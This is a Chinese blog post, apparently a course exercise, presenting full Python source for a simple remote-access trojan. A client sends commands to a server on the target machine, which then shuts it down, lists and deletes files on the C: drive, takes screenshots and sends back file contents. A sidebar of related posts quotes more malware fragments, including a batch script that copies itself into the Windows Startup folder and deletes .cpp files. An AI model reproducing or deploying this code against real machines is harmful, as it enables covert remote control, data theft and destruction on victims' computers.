信息对抗-简易木马程序

最新推荐文章于 2022-03-17 19:30:30 发布
最新推荐文章于 2022-03-17 19:30:30 发布
阅读量270 收藏
点赞数 1
分类专栏: 信息对抗 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44190459/article/details/118313627
版权

题目介绍

本程序中源IP 地址和目的IP 地址需要在代码中编写,因此,在不同的主机上运行此木马之前要对程序进行调试。在设置好源、目的IP 地址后,便可以通过client 发送指令,对server 进行操作。下面,对具体功能进行简要的介绍。

  1. 输出字符串

在服务端输出字符串“Hello world”。

  1. 关机

令服务端(server)主机在60 秒内关机。

  1. 取消关机

在关机时限(60 秒)内,可以取消服务端主机关机。

  1. 获取C 盘文件列表

获取此时服务端(server)主机的C 盘列表

  1. 截屏

截取此时服务端(server)主机的桌面图像

  1. 删除

在服务端(server)主机C 盘列表中选取并删除指定文件。

  1. 上传

在客户端(Client)主机中选取指定文件, 将其内容传送并保存至文件
“myFile.txt”。

  1. 下载

在服务端(server)主机C 盘列表中选取指定文件,将其内容拷贝至文件
“myFile.txt”,并保存至所选路径下。

代码

client
import socket

host = "127.0.0.1"
port = 8888


def main():
    while 1:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((host, port))
        order = get_order()
        try:
            handle_order(order, client_socket)
        except Exception as e:
            print("出现异常")
            continue
        client_socket.close()


def get_order():
    print("1.输出字符串")
    print("2.关机")
    print("3.取消关机")
    print("4.获取c盘文件列表")
    print("5截屏")
    print("6删除")
    print("7上传")
    print("8下载")
    print("0退出")
    order = input("输入指令:")
    return order


def send_str(client_socket):
    my_str = "hello world"
    client_socket.send(("say-"+my_str).encode())
    return None


def shut_down(client_socket):
    client_socket.send("shutdown".encode())
    return None


def cancel_shutdown(client_socket):
    client_socket.send("cancel".encode())
    return None


def get_c(client_socket):
    client_socket.send("get_c".encode())
    c_list = b''
    while 1:
        data = client_socket.recv(1024)
        if data != b"":
            c_list += data
        else:
            break
    print(c_list)
    return None


def shot_image(client_socket):
    client_socket.send("shot_image".encode())
    return None


def delete_file(client_socket):
    name = input("从c盘列表选择文件删除:")
    client_socket.send(("delete-" + name).encode())
    return None


def upload(client_socket):
    with open("1.txt", 'r') as f:
        file = f.read()
        client_socket.send(("upload-" + file).encode())
    return None


def download(client_socket):
    name = input("从c盘列表选择文件下载:")
    client_socket.send(("download-"+name).encode())
    result_data = b''
    while 1:
        data = client_socket.recv(1024)
        if data != b"":
            result_data += data
        else:
            break
    res = result_data.decode()
    with open("myFile.txt", 'w') as file:
        file.write(res)

    return None


def handle_order(order, client_socket):
    if order == '0':
        print("谢谢使用")
        client_socket.close()
        exit()
    if order == '1':
        send_str(client_socket)
    if order == '2':
        shut_down(client_socket)
    if order == '3':
        cancel_shutdown(client_socket)
    if order == '4':
        get_c(client_socket)
    if order == '5':
        shot_image(client_socket)
    if order == '6':
        delete_file(client_socket)
    if order == '7':
        upload(client_socket)
    if order == '8':
        download(client_socket)


if __name__ == "__main__":
    main()
server
import socket
import os
from PIL import ImageGrab

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 8888
s.bind((host, port))
s.listen(1)


def main():
    print("正在尝试连接")
    while 1:
        client_socket = s.accept()[0]
        print("连接成功")
        order = client_socket.recv(1024).decode()
        try:
            execute_order(order, client_socket)
        except Exception as e:
            print("出了点问题")
            continue
        client_socket.close()


def split_order(order):
    order_list = order.split("-")
    return order_list[1]


def execute_order(order, client_socket):
    if "say" in order:
        param = split_order(order)
        print(param)
    if "shutdown" in order:
        os.system("shutdown -s -t 60")
    if "cancel" in order:
        os.system("shutdown -a")
    if "get_c" in order:
        get_c(client_socket)
    if "shot_image" in order:
        shot_image()
    if "delete" in order:
        param = split_order(order)
        delete_file(param)
    if "upload" in order:
        param = split_order(order)
        upload_file(param)
    if "download" in order:
        param = split_order(order)
        download(param, client_socket)


def get_c(client_socket):
    file_name = os.listdir(r'C:\\')
    file_list = ""
    for file in file_name:
        file_list += file + " "
    client_socket.send(file_list.encode())


def shot_image():
    pic = ImageGrab.grab()
    pic.save('shot.jpg')


def delete_file(name):
    os.remove(("C:\\" + name))


def upload_file(param):
    with open("myFile.txt", 'w') as file:
        file.write(param)


def download(param, client_socket):
    path = "C:\\"+param
    file = os.open(path, os.O_RDWR)
    res = os.read(file, 12)
    client_socket.send(res)


if __name__ == "__main__":
    main()
JJT_with_hair
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信息安全原理与技术第七次实验:木马攻击与防范
sjx3161的博客
06-04 6551
为了帮助同学们完成痛苦的实验课程设计,本作者将其作出的实验结果及代码贴至CSDN中,供同学们学习参考。如有不足或描述不完善之处,敬请各位指出,欢迎各位的斧正!1.掌握目前网络中常见的七种木马的检测及清除方法; 2.学会使用工具检测并清除木马。1.木马的概念与发展历史 计算机世界中的特洛伊木马病毒的名字由《荷马史诗》的特洛伊战记得来。故事说的是希腊人围攻特洛伊城十年后仍不能得手,于是阿迦门农受雅典娜的启发:把士兵藏匿于巨大无比的木马中,然后佯作退兵。当特洛伊人将木马作为战利品拖入城内时,高大的木马正好卡在城门
超强C++木马病毒(含代码,样本)
yaosichengalpha的博客
11-26 2168
超强C++木马病毒(含代码,样本)
二进制安全之木马程序简介
weixin_51339377的博客
03-17 983
当作(计算机会把不同的程序作为什么类型的文件和不同的方式来进行执行) 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!! 操作系统为了方便用户使用,使用后缀名这个机制: .exe .dll .jpg .jpeg .png .avi .mp3 .mp4.... 逆向工程工具:C32 协议: 李老师协议: 协议头001100->内容1->结束语1111 001100 xxxxxxxxx xxxx xxxx xxxxx 1111 0101110101
c语言木马程序,网上看到的一个用C语言编写的木马源程序代码大家一起学学
weixin_39653764的博客
05-17 937
c程序源码以下是在网上看到的一个用C语言编写的木马源程序代码大家一起学学#include#pragma comment(lib,"ws2_32.lib")#include#include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构 ;typedef struct _RemotePara{DWORD dwLo...
一个简单木马程序的实现
BlackNight168的博客
09-20 1万+
参考链接:一个简单的木马程序的实现 详细说明: 该代码生成的 exe 文件,点击之后,生成木马被控端,在主控端执行 cmd 命令:telnet 192.168.1.100 999 1、点击 enter 键,即可获得对方 命令终端 2、在命令终端执行 exit 可关闭被控端连接 ...
BUAA-信息对抗-网络攻防期末
最新发布
06-23
信抗,懂的都懂。wtb
信息对抗技术-溢出攻击.
06-12
信息对抗技术:深入理解缓冲区溢出攻击》 缓冲区溢出攻击是网络中最为常见的一种信息对抗技术,据估计,这类攻击占据了网络攻击的60%至70%的比例。攻击的主要目的并非直接破坏系统,而是通过巧妙地操纵程序流程,...
信息对抗技术专业课资料下
03-04
信息对抗技术专业课资料详解》 在信息技术日益发展的今天,信息安全成为了不可或缺的重要领域,而信息对抗技术作为其中的关键组成部分,对于保障网络安全、防御黑客攻击、保护数据安全具有至关重要的作用。本资源...
信息对抗技术资料上.rar
03-04
信息对抗技术资料》是一个综合性的学习资源包,主要涵盖了信息对抗领域的基础知识,包括信息对抗导论、数字电路基础、模拟电路基础以及电磁场与电磁波等关键主题。这个资源包特别适合对信息对抗技术感兴趣的学生或...
红蓝对抗背景下的攻击与防护 - 2024
05-09
红蓝对抗是网络安全领域常见的一种对抗性演练方法,是指为发现并整改企业内外网资产及业务数据深层次安全隐患,在确保业务平稳运行的前提下,整合平台安全威胁监测能力、应急处置能力和防护能力,以真实网络环境开展...
c语言木马源代码,【C语言】后台木马程序
weixin_39583655的博客
05-25 384
该楼层疑似违规已被系统折叠隐藏此楼查看此楼DWORD dwWrited = 0, dwRecvd = 0;char szBuf[MAX_PATH] = {0};BOOL bRet = FALSE;while ( TRUE ) {dwRecvd = recv(tNode.m_Sock, szBuf, MAX_PATH, 0);if ( dwRecvd > 0 && dwRec...
无dll无进程木马源代码
benny5609的专栏
02-27 1101
#include//#include#include#include#pragma comment(lib,"Shlwapi.lib")//参数结构 ;typedef struct _RemotePara{DWORD dwLoadLibrary;DWORD dwFreeLibrary;DWORD dwGetProcAddress;DWORD dwGetModuleHandle;DWORD dwWS
简单木马的编写
weixin_44540487的博客
08-09 2118
MINI木马的编写 编写一个服务端,服务端开启远程后门 客户端使用telnet命令来操控该木马 先进行服务段的编写 WSADATA wsaData; SOCKET ServiceSocket,ClientSocket; SOCKADDR_IN SockAddr; int SockAddrSize; WSAStartup(MAKEWORD(2, 2), &wsaData); SockAddr.sin_family = AF_INET; SockAddr.sin_addr.S_un.S_add
木马病毒代码
m0_65955912的博客
01-21 1万+
这个病毒的功能是删除当前目录下.cpp类型的代码。 copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" copy %0 d:\ copy %0 e:\ del *.cpp attrib +h %0 1.病毒启动测试: copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
python写一个木马_Python编写简易木马程序 - 博客频道 - CSDN.NET
weixin_39663933的博客
02-09 1013
本文章为小川先生原创,转载可以,请标明出处。 最近开始学python了,然后不小心开了个ss服务器,然后有同学找我要账号,我说,那好吧,回去给你整一个。但实际上,加个账号得改ss的json格式的配置文件,然后改完还得重启ss服务,配置文件要是不小心少个逗号0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Su...
一个 简单的cmd 木马(源代码)
热门推荐
tony的专栏
10-25 4万+
一个 简单的cmd 木马(源代码) // woodtc.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include "WoodSMTP.h"#define BUFFER_SIZE 1024typedef struct{HANDLE hPipe;SOCKET sC
软件安全:特洛伊木马与恶意程序详解
本章节深入探讨了"第7章软件安全与恶意程序",聚焦于信息安全领域中的一个重要议题。章节首先回顾了计算机病毒的历史,指出早在1949年冯.诺依曼的论文中就预示了病毒软件的可能性。随后,通过介绍贝尔实验室的"磁芯...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值